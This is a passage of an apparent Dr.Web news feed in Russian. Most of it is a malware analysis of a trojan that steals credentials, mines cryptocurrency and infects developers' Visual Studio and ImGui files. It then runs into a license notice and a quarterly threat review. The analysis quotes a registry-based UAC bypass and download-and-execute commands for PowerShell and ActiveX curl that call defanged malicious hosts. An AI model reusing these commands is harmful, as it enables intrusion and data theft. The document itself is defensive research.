href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35687&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;внедряет ее в процесс одного из 41 заранее указанных исполняемых файлов из &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;Адрес домена С2, с которым удалось установить связь, добавляется к прописанным в исходном коде трояна строкам и передается следующей стадии через именованный канал pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Стадия 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;На этой стадии происходит основная вредоносная деятельность. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; создает объект синхронизации mutex с фиксированным именем вида Global\PFNX_Side (фиксированное значение). Затем через ранее созданный канал троян получает данные от второй стадии, откуда извлекает идентификаторы трояна и домен С2, с которым &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; будет коммуницировать.&lt;/p&gt;&lt;p&gt;Чтобы закрепиться в системе, троян скачивает файл «bungee.boo», который выполняет функции стадии 2 —&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35687&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, и подменяет им DLL файлы:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;«profapi.dll» приложения Discord,&lt;/li&gt;&lt;li&gt;«domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains» приложения Microsoft Edge,&lt;/li&gt;&lt;li&gt;«C:\Windows\omadmapi.dll».&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Дополнительно &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.&lt;/p&gt;&lt;p&gt;Для действий с правами администратора троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.&lt;/p&gt;&lt;h3&gt;Стилер&lt;/h3&gt;&lt;p&gt;Троян способен красть различную информацию:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;токены Discord, которые позволяют войти в чужие аккаунты без ввода логина/пароля;&lt;/li&gt;&lt;li&gt;пароли и куки из браузеров Chrome, Edge, Opera, Brave, Yandex и др. Кроме обычных техник извлечения данных, может использовать файл CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). Он встраивается в браузер, а затем считывает пароли и сохраняет их в текстовые файлы;&lt;/li&gt;&lt;li&gt;папки Telegram Desktop;&lt;/li&gt;&lt;li&gt;папки криптокошелька Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; при помощи curl. В подмененной версии в index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Подмененный файл index.js&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Клиппер&lt;/h3&gt;&lt;p&gt;Особо опасная функция трояна. ВПО постоянно следит за буфером обмена пользователя: ищет данные банковских карт и отправляет их на сервер злоумышленников. Также вредонос заменяет адреса криптокошельков на подставные, которые получает от C2 сервера.&lt;/p&gt;&lt;h3&gt;Бэкдор&lt;/h3&gt;&lt;p&gt;Функциональность трояна позволяет злоумышленникам удаленно управлять зараженным ПК с помощью команд:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;скачать файл с url при помощи curl и запустить его&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;запустить Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;запустить команду через cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;загрузить содержимое определенного файла на управляющий сервер&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;отправить список файлов из определенной директории компьютера на управляющий сервер&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;запустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т.&amp;nbsp;д.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Майнер&lt;/h3&gt;&lt;p&gt;При помощи curl троян скачивает с сервера и запускает файл &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. Своим строением и действиями он похож на стадию 2, только вместо &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; он скачивает и внедряет &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Этот майнер запускается только после определенного периода бездействия пользователя. ВПО использует инструменты &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; и &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner &lt;/a&gt;с открытым исходным кодом.&lt;/p&gt;&lt;h3&gt;Заражение файлов&lt;/h3&gt;&lt;p&gt;Главная отличительная черта этого трояна&amp;nbsp;— заражение файлов и дальнейшее самостоятельное распространение. Список заражаемых файлов:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj и .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Злоумышленники строят свой расчет на том, что разработчики будут публиковать свои проекты с вредоносным кодом в открытом доступе. Другие разработчики, которые будут собирать, компилировать или модифицировать проект, автоматически заразят свои компьютеры из-за файлов &lt;span class="string"&gt;.suo&lt;/span&gt;, &lt;span class="string"&gt;.vcxproj&lt;/span&gt; и &lt;span class="string"&gt;.csproj&lt;/span&gt;, а обычные пользователи могут запустить зараженные исполняемые файлы, созданные с помощью скомпрометированных инструментов разработки.&lt;/p&gt;&lt;h3&gt;Файл imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;Файл &lt;span class="string"&gt;imgui_impl_win32.cpp&lt;/span&gt;&amp;nbsp;— часть популярной библиотеки Dear ImGui, отвечающей за графический интерфейс для языка программирования С++. Троян внедряет в файл две строки: первая содержит полезную нагрузку, вторая запускает ее.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Строка кода с полезной нагрузкой&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Строка кода с запуском пэйлоада&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Итог&amp;nbsp;— команда&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Таким образом, библиотека оказывается зараженной и любые созданные пользователем приложения на С++ будут иметь в себе вредоносный код. При передаче или загрузке подобных приложений заражение будет распространяться дальше.&lt;/p&gt;&lt;h3&gt;Файлы .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Зараженный файл&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В результате при открытии проекта в Visual Studio запускается вредоносный код:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;Файлы winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK&amp;nbsp;— официальный набор инструментов Microsoft, который позволяет создавать приложения для ОС Windows.&lt;/p&gt;&lt;p&gt;С помощью реестра троян находит папку, куда установлен Windows SDK. В этой папке происходит поиск файла &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, ответственного за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Зараженный файл winnetwk.h&lt;/i&gt;&lt;/p&gt;&lt;p&gt;После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код, который запускает стадию 2.&lt;/p&gt;&lt;h3&gt;Файлы .exe&lt;/h3&gt;&lt;p&gt;Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35384&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, он же стадия 1.&lt;/p&gt;&lt;h3&gt;Файлы .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. Ранние версии трояна добавляли код, подобный стадии 1.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Ранняя версия кода&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В новых версиях код стал сложнее, появилась дополнительная обфускация.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Новая версия кода&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Один из этапов выполнения &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;YouTube-аккаунт с зашифрованным URL-адресом&lt;/i&gt;&lt;/p&gt;&lt;p&gt;После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной со стадией 2.&lt;/p&gt;&lt;p&gt;Описание работы трояна позволяет сделать вывод, что он представляет повышенную опасность из-за комбинирования целого ряда вредоносных функций. Во избежание заражения своего компьютера и дальнейшего распространения трояна рекомендуем регулярно обновлять антивирусные базы и проверять все скачанные из интернета файлы. Пользователи антивируса Dr.Web Security Space и Dr.Web Desktop Security Suite могут быть спокойны, поскольку троян надежно определяется и удаляется антивирусами Dr.Web. Файлы типа .vcxproj, .csproj и imgui лечатся, из них удаляется вредоносный код.&lt;/p&gt;

&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35384&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35687&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=BackDoor.Siggen2.5906&amp;lng=ru"&gt;&lt;b&gt;BackDoor.Siggen2.5906&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее&amp;nbsp;об&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.BtcMine.3956&amp;lng=ru"&gt;&lt;b&gt;Trojan.BtcMine.3956&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/DevRuntime/README.adoc" target="_blank" rel="noopener"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15278&amp;lng=ru</guid><title>Обновлено Лицензионное соглашение к программным продуктам Dr.Web</title><link>https://news.drweb.ru/show/?i=15278&amp;lng=ru&amp;c=5</link><pubDate>Thu, 02 Jul 2026 16:05:38 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» обновила Лицензионное соглашение к программным продуктам Dr.Web. С документом можно ознакомиться по ссылке &lt;a href="https://license.drweb.ru/agreement/."&gt;https://license.drweb.ru/agreement/.&lt;/a&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Перечень изменений:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;текст структурирован по тематическим разделам для удобной навигации;&lt;/li&gt;&lt;li&gt;даны определения терминов для лучшего понимания текста документа и предупреждения ошибочного толкования;&lt;/li&gt;&lt;li&gt;уточнена разница между разрешенным и нелицензионным использованием программных продуктов Dr.Web;&lt;/li&gt;&lt;li&gt;даны пояснения касательно часто возникающих у пользователей вопросов: на каких устройствах можно использовать приобретенную лицензию, обязательно ли иметь защищаемое устройство в своей собственности, и другие подобные.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Используя программные продукты Dr.Web после вступления в силу новой редакции Лицензионного соглашения, тем самым вы подтверждаете принятие новых условий в полном объеме. Если вы не согласны с изменениями, вам необходимо удалить ПО Dr.Web со своих устройств.&lt;/p&gt;&lt;p&gt;Обращаем ваше внимание, что данный документ актуален для всех программных продуктов семейства Dr.Web за исключением Dr.Web FixIt! и Dr.Web vxCube. Эти два решения имеют собственные Лицензионные соглашения.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15275&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности во II квартале 2026 года</title><link>https://news.drweb.ru/show/?i=15275&amp;lng=ru&amp;c=5</link><pubDate>Wed, 01 Jul 2026 09:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/review_common_q2_2026_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;1 июля 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно статистике детектирований антивируса Dr.Web, во II квартале 2026 года общее число обнаруженных угроз увеличилось на 5,72% по сравнению с I кварталом. Число уникальных угроз возросло на 95,32%. Чаще всего на защищаемых устройствах обнаруживались рекламные приложения и рекламные трояны, вредоносные программы-майнеры и трояны, которые используются для запуска других угроз.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В почтовом трафике наиболее часто детектировались вредоносные скрипты и различные троянские приложения, среди которых были загрузчики, дропперы, похитители паролей и майнеры. Распространение также получили бэкдоры, фишинговые документы и различные эксплойты.&lt;/p&gt;

&lt;p&gt;Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; и &lt;b&gt;Trojan.Encoder.37400&lt;/b&gt;. При этом число поступивших в Службу технической поддержки «Доктор Веб» запросов на расшифровку по сравнению с предыдущим кварталом несколько сократилось.&lt;/p&gt;

&lt;p&gt;Во II квартале 2026 года интернет-аналитики компании «Доктор Веб» наблюдали рост числа фишинговых атак на пользователей мессенджера MAX. Злоумышленники также эксплуатировали актуальную новостную повестку и соответствующим образом подстраивали под нее популярные мошеннические схемы.&lt;/p&gt;

&lt;p&gt;В апреле стало известно, что в одном из обновлений Microsoft Visual Studio Code &lt;a href="https://news.drweb.ru/show/?i=15146" target="_blank"&gt;содержался вредоносный код&lt;/a&gt;. Им оказался троянский скрипт в составе публичной JavaScript-библиотеки es5-ext, которая была включена в обновленное ПО. Данный скрипт запускается при условии соответствия часового пояса ряда российских городов и демонстрирует в консоли разработчика призыв с антироссийской позицией.&lt;/p&gt;

&lt;p&gt;В мае мы &lt;a href="https://news.drweb.ru/show/?i=15253" target="_blank"&gt;предупредили&lt;/a&gt; о распространении вредоносной программы JobStealer, нацеленной на пользователей macOS и Windows. Киберпреступники выдавали ее за ПО для проведения онлайн-собеседований. Троян JobStealer похищает различную конфиденциальную информацию, включая данные из порядка 300 браузерных расширений-криптокошельков, файлы мессенджера Telegram, сохраненные в браузерах пароли и данные банковских карт, а также файлы куки.&lt;/p&gt;

&lt;p&gt;В июне специалисты антивирусной лаборатории компании «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15262" target="_blank"&gt;рассказали&lt;/a&gt; о новом рекламном трояне &lt;a href="https://vms.drweb.ru/search/?q=Android.MagicAd.1&amp;lng=ru"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, способном демонстрировать рекламу в фоновом режиме благодаря возможности обходить ограничения операционной системы Android. Для этого троян эксплуатирует сторонние приложения, выбирая необходимую методику в зависимости от производителя целевого устройства.&lt;/p&gt;

&lt;p&gt;Среди вредоносных приложений для Android-устройств лидерство по числу детектирований на защищаемых устройствах сохранили банковские трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. При этом вирусописатели продолжили активно использовать различные инструменты для моддинга Android-программ, чтобы защитить вредоносное ПО от детектирования антивирусами. Вместе с тем, в течение II квартала наши вирусные аналитики обнаружили в каталоге Google Play ряд новых троянских программ, созданных для подписки пользователей на платные мобильные услуги.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции II квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Возросло число угроз, обнаруженных на защищаемых устройствах.&lt;/li&gt;
        &lt;li&gt;Среди детектируемых угроз значительно увеличилось число уникальных файлов.&lt;/li&gt;
        &lt;li&gt;Количество запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, по сравнению с I кварталом сократилось.&lt;/li&gt;
        &lt;li&gt;Мошенники стали чаще атаковать пользователей российского мессенджера MAX.&lt;/li&gt;
        &lt;li&gt;Банковские трояны &lt;b&gt;Android.Banker&lt;/b&gt; остались самыми распространенными вредоносными программами для Android-устройств.&lt;/li&gt;
        &lt;li&gt;Специалисты «Доктор Веб» обнаружили рекламный троян &lt;b&gt;Android.MagicAd.1&lt;/b&gt;, способный обходить ограничения ОС Android и показывать объявления из фонового режима.&lt;/li&gt;
        &lt;li&gt;Вирусописатели распространяли вредоносную программу JobStealer, предназначенную для кражи конфиденциальных данных у пользователей компьютеров под управлением macOS и Windows.&lt;/li&gt;
        &lt;li&gt;В одном из обновлений Microsoft Visual Studio Code был обнаружен вредоносный код.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным сервиса статистики «Доктор Веб»&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы II квартала 2026 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Adware.Downware.20091&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Starter.8319&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных XML-скриптов, которые запускают троян &lt;a href="https://vms.drweb.ru/search/?q=Trojan.AutoIt.289&amp;lng=ru"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; и его компоненты.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Статистика вредоносных программ в почтовом трафике&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы II квартала 2026 года в почтовом трафике&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;X97M.DownLoader.2343&lt;/dt&gt;
    &lt;dd&gt;XLSX-файл (формат электронных таблиц Microsoft Excel) с OLE-объектом, скачивающим вредоносный файл на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.&lt;/dd&gt;
    &lt;dt&gt;JS.Muldrop.1171&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт в формате JavaScript, который запускает в целевой системе скрытое в нем ВПО.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

&lt;p&gt;По сравнению с I кварталом 2026 года, во II квартале число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, незначительно сократилось — на 2,67%.&lt;/p&gt;

&lt;p&gt;Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

